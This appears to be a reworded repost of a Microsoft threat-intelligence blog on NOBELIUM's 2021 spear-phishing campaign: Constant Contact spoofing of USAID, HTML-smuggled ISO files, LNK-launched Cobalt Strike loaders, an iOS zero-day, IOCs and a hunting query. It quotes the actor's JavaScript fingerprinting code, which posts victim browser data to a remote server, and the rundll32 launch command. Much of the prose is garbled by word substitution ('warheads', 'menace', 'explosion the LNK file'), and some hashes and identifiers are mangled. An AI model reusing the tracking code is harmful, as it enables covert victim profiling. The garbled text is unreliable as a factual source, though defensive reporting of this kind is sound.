Microsoft Threat Intelligence Center( MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the two attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, information campaigns escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact, to masquerade as a US-based development organization to distribute malicious URLs to a wide variety of organizations and industry verticals.

Microsoft is issuing this alert and new security research regarding this sophisticated email-based campaign that NOBELIUM has been operating to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practises to protect against this attack. You are also welcome to find more information on the Microsoft On The Issue blog.

Note: This is an active incident. We will post more details here as they become available.

NOBELIUM has historically targeted government organizations , non-government organizations( NGOs ), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual reports across more than 150 organisations, employing an established pattern of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.

This new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links “thats been” obliterated behind the mailing service’s URL( many email and document services offer a mechanism to simplify the sharing of files, furnishing insights into who and when links are clicked ). Due to the high volume of emails distributed in this campaign, automated email menace detection systems blocked most of the malicious emails and differentiated them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy situates or prior to detections being in place.

Due to the fast-moving nature of education campaigns and its perceived scope, Microsoft fosters organizations to investigate and monitor communications matching characteristics outlined in this report and take the actions described below in this article.

We continue to see an increase in sophisticated and nation-state-sponsored attacks and, as part of our ongoing menace research and efforts to protect customers, we will continue to provide guidance to the security community on how to secure against and respond to sophisticated multi-dimensional attacks.

Spear phishing campaign delivers NOBELIUM warheads

The NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly when compared to NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that the observations represent changes in the actor’s tradecraft and possible experimentation following widespread revealings of previous incidents.

Early tests and initial breakthrough

As part of the initial breakthrough of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who retrieved the URL. MSTIC tracked the start of this campaign to January 28, 2021, when the actor was apparently performing early reconnaissance by only mailing the tracking section of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious warhead was observed during this early activity.

Evolving delivery techniques

In the next evolution of information campaigns, MSTIC find NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in it being mounted much like an external or network drive. From here, a shortcut file( LNK) would execute an accompany DLL, which would result in Cobalt Strike Beacon executing on the host.

Example Flow of HMTL/ISO infection chain.

Figure 1. Example Flow of HMTL/ ISO infection chain.

Example of target fingerprinting code leveraging Firebase 😛 TAGEND

try let sdfgfghj= ”; let kjhyui= new XMLHttpRequest ();‘GET’, ‘https :// format= jsonp? callback =? ‘, false ); kjhyui.onreadystatechange= part () sdfgfghj= this.responseText; kjhyui.send( null ); let ioiolertsfsd= navigator.userAgent; let uyio= window.location.pathname.replace( ‘/ ‘, ” ); var ctryur= ‘io’: ioiolertsfsd, ‘tu’: uyio, ‘sd’: sdfgfghj ; ctryur= JSON.stringify( ctryur ); let sdfghfgh= new XMLHttpRequest ();‘POST’, ‘https :// root.json’, false ); sdfghfgh.setRequestHeader(‘Content-Type’, ‘application/ json’ ); sdfghfgh.send(ctryur); catch( e)

Similar spear-phishing campaigns were located throughout March, which included the NOBELIUM actor constructing several adjustments to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which consists of an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing specific targeted organizations, from where the ISO was distributed.

The phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves , no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2 021 -1 879 was served.

Escalated targeting and delivery

Experimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked consumers employing a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the purpose of applying the service. The actor sometimes hired checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.

In May 2021, the actor altered techniques once more by maintaining the HTML and ISO combination, but dropped a tradition. NET first-stage implant, detected as TrojanDownloader: MSIL/ BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.

On May 25, the NOBELIUM campaign intensified significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and recognized them as spam. Nonetheless, automated systems might have successfully delivered some of the earlier emails to recipients.

In the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID , while having an authentic sender email address that matches service standards Constant Contact service. This address( which differs for each recipient) concludes with @, and( which differs for each recipient ), and a Reply-To address of was observed. The emails recognized pose as an alert from USAID, as insured below.

Example email screenshot.

Figure 2. Example email screenshot.

If the user clicked on the link in the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern 😛 TAGEND

https :// r20. rs6 [.] net/ tn.jsp? f =P TAGEND

However, the user is then redirected to NOBELIUM-controlled infrastructure, with a URL following the pattern shown below 😛 TAGEND

https :// usaid.theyardservice [.] com/ d /< target_email_address>

A malicious ISO file is then delivered to the target’s computer. Within this ISO file are the following files that are saved in the% USER %\ AppData \ Local \ Temp \< random folder epithet >\ route 😛 TAGEND

A shortcut, such as Reports.lnk, that executes a custom Cobalt Strike Beacon loader. A decoy document, such as ica-declass.pdf, that is displayed to the target. A DLL, such as Document.dll, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft.

The successful deployment of these warheads enables NOBELIUM to achieve persistent access to compromised machines. Then, the successful execution of these malicious warheads could enable NOBELIUM to conduct action-on objectives, such as lateral motion, data exfiltration, and delivery of additional malware.

IOCs for the campaign passing on May 25 are provided in this blog for employ by security teams to be determined performer activity.

Microsoft security researchers assess that the NOBELIUM’s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group utilizing an evolving placed of tactics.

Microsoft continues to monitor evolving this menace actor’s activities and will update as needed. Microsoft t3 65 Defender delivers coordinated defense against this menace. Microsoft Defender for Office 365 sees the malicious emails, and Microsoft Defender for Endpoints detects the malware and malicious behaviours. Additionally, clients should follow defensive guidance and leverage advanced hunting to help mitigate variants of performer activity.

ISO file contents with hidden

Figure 3. ISO file contents- Worth noting that the “Documents.dll” is a conceal file.

Shortcut which executes the hidden DLL file.

Figure 4. Shortcut which executing the disguise DLL file.

The end result when explosion the LNK file is the execution of “C :\ Windows \ system3 2 \ rundll3 2. exe Documents.dll, Open”.


Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants. Run EDR in block modeso that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode.( EDR in block mode works behind the scenes to remediate malicious artifacts that are seen post-breach .) Enable network protection to prevent applications or users from accessing malicious realms and other malicious content on the internet. Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve violates, significantly reducing alert volume. Utilize device discoveryto increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint. Enable multifactor authentication( MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to secure your reports. For Office 365 customers, visualize multifactor authentication support. For Consumer and Personal email accounts, see how to use two-step verification. Turn on the following attack surface reduction rule to block or audit activity associated with this threat: Block all Office applications from creating child processes. NOTE: Assess rule impact before deployment.

Indicators of compromise( IOC)

This attack is still active, so these indicators should not be considered exhaustive for this observed activity.

These indicators of compromise are from the large-scale campaign launched on May 25, 2021.


ashainfo @usaid. gov Email Spoofed email account

mhillary @usaid. gov Email Spoofed email account

2523 f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 SH-A256 Malicious ISO file( container)

d035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 SH-A256 Malicious ISO file( container)

9478606 6a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 SH-A256 Malicious ISO file( container)

48 b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 SH-A256 Malicious shortcut( LNK)

ee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c SH-A256 Cobalt Strike Beacon malware

ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 SH-A256 Cobalt Strike Beacon malware

usaid.theyardservice [.] com Domain Subdomain used to distribute ISO file

worldhomeoutlet [.] com Domain Subdomain in Cobalt Strike C2

dataplane.theyardservice [.] com Domain Subdomain in Cobalt Strike C2

cdn.theyardservice [.] com Domain Subdomain in Cobalt Strike C2

static.theyardservice [.] com Domain Subdomain in Cobalt Strike C2

192 [.] 99 [.] 221 [.] 77 IP address IP resolved to by worldhomeoutlet [.] com

83 [.] 171 [.] 237 [.] 173 IP address IP resolved to by* theyardservice [.] com

theyardservice [.] com Domain Actor controlled domain

Detection details Antivirus

Microsoft Defender Antivirus detects menace ingredients as the following malware 😛 TAGEND

Trojan: Win3 2/ NativeZone.C! dha

Endpoint Detection and Response( EDR)

Alerts with the following titles in the Security Center can indicate threat activity on your network 😛 TAGEND

Malicious ISO File used by NOBELIUM. Cobalt Strike Beacon used by NOBELIUM. Cobalt Strike network infrastructure used by NOBELIUM.

The following alarms might also indicate threat activity associated with this threat. These alarms, nonetheless, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

An uncommon file was created and added to startup folder. A connect file( LNK) with unusual characteristics was opened.

Advanced hunting Microsoft 365 Defender

The following sample queries lets you sought for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential NOBELIUM email campaign-related indicators for more than a week, go to the Advanced Hunting page> Query tab, select the calendar drop-down menu to update your query to hunt for the Last 30 days.

To locate possible exploitation activity, run the following queries in the Microsoft 365 security middle.

Azure Sentinel

Azure Sentinel customers can find a Sentinel query containing these indicators in this GitHub repository.

NOBELIUM Abuse of USAID Constant Contact resources in email data

Looks for a recent mail to the organization that originates from Constant Contact original sending infrastructure and from specifically the accounts spoofed or compromised in the campaign detailed in this report. That secondary account can be adjusted if new reports start. Then the query examines whether or not the mail is accompanied by a URL which redirects the user to file hosting by Constant Contact which enables us to download the malicious files. Query can be adjusted with additional URLs or joined further to the attachment tables if attachment methods such as HTML documents are utilized again in the future.

EmailUrlInfo | where UrlDomain has “rs6. net” | join kind= inner EmailEvents on$ left.NetworkMessageId ==$ right.NetworkMessageId | where SenderMailFromAddress endswith “” | where SenderFromAddress endswith “”

Mitre ATT& CK techniques find

This threat induces apply of attacker techniques documented in the MITRE ATT& CK framework.

Initial access

T1 566.003 Phishing: Spearphishing via ServiceNOBELIUM employed the legitimate mass mailing service, Constant Contact to send their emails. T1 566.002 Phishing: Spearphishing Link–The emails sent by NOBELIUM includes a URL that directs a user to the legitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.


T1 610 Deploy Container–Payload is delivered via an ISO file which is mounted on target computers. T1 204.001 User Execution: Malicious Relate–Cobalt Strike Beacon warhead is executed via a malicious associate( LNK) file.

Command and control

T1071. 001 Application Layer Protocol: Web Protocols–Cobalt Strike Beacons call out to attacker infrastructure via port 443.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the most recent developments and updates on cybersecurity.

The post New sophisticated email-based attack from NOBELIUM appeared first on Microsoft Security .

Read more: